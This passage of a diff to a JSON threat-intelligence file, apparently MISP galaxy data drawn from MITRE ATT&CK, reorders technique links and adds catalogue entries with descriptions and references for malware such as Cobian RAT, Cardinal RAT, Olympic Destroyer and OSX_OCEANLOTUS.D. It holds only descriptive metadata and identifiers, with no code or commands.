"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1185,27 +1795,6 @@ ], "type": "uses" }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", "tags": [ @@ -1213,6 +1802,27 @@ ], "type": "uses" }, + { + "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2", "tags": [ @@ -1220,13 +1830,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ @@ -1235,7 +1838,7 @@ "type": "uses" }, { - "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1261,6 +1864,41 @@ ] }, "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ @@ -1268,6 +1906,34 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -1275,6 +1941,151 @@ ], "type": "uses" }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b9799466-9dd7-4098-b2d6-f999ce50b9a8", + "value": "Gold Dragon - S0249" + }, + { + "description": "[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)", + "meta": { + "external_id": "S0338", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0338", + "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" + ], + "synonyms": [ + "Cobian RAT" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "aa1462a1-d065-416c-b354-bedd04998c7f", + "value": "Cobian RAT - S0338" + }, + { + "description": "[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)", + "meta": { + "external_id": "S0348", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0348", + "https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/" + ], + "synonyms": [ + "Cardinal RAT" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -1282,6 +2093,62 @@ ], "type": "uses" }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -1297,19 +2164,81 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b879758f-bbc4-4cab-b5ba-177ac9b009b4", + "value": "Cardinal RAT - S0348" + }, + { + "description": "[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was first seen infecting computer systems at the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware appears to be to cause destructive impact to the affected systems. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. The malware has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018) ", + "meta": { + "external_id": "S0365", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0365", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + ], + "synonyms": [ + "Olympic Destroyer" + ] + }, + "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -1318,50 +2247,92 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "b9799466-9dd7-4098-b2d6-f999ce50b9a8", - "value": "Gold Dragon - S0249" + "uuid": "3249e92a-870b-426d-8790-ba311c1abfb4", + "value": "Olympic Destroyer - S0365" }, { "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", @@ -1474,27 +2445,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ @@ -1502,13 +2452,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -1517,7 +2460,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1530,6 +2473,27 @@ ], "type": "uses" }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -1545,7 +2509,14 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1578,13 +2549,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ @@ -1592,13 +2556,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -1606,13 +2563,6 @@ ], "type": "uses" }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ @@ -1620,20 +2570,6 @@ ], "type": "uses" }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -1647,6 +2583,41 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "66b1dcde-17a0-4c7b-95fa-b08d430c2131", @@ -1683,7 +2654,7 @@ "type": "uses" }, { - "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1696,6 +2667,34 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -1709,34 +2708,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "5967cc93-57c9-404a-8ffd-097edfa7bdfc", @@ -1794,6 +2765,20 @@ ], "type": "uses" }, + { + "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", "tags": [ @@ -1815,20 +2800,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ @@ -1837,7 +2808,7 @@ "type": "uses" }, { - "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1903,6 +2874,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "89fcd02f-62dc-40b9-a54b-9ac4b1baef05", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c6a146ae-9c63-4606-97ff-e261e76e8380", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4bf6ba32-4165-42c1-b911-9c36165891c8", @@ -1932,7 +2931,7 @@ "type": "uses" }, { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1945,26 +2944,26 @@ ], "type": "uses" }, - { - "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "40d3e230-ed32-469f-ba89-be70cc08ab39", @@ -2001,13 +3000,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ @@ -2030,7 +3022,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2044,14 +3043,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2065,14 +3064,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2106,21 +3105,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2133,6 +3118,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -2141,7 +3133,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2151,6 +3150,96 @@ "uuid": "82cb34ba-02b5-432b-b2d2-07f55cbf674d", "value": "Trojan.Karagany - S0094" }, + { + "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)", + "meta": { + "external_id": "S0352", + "mitre_platforms": [ + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0352", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" + ], + "synonyms": [ + "OSX_OCEANLOTUS.D" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e99ec083-abdd-48de-ad87-4dbf6f8ba2a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 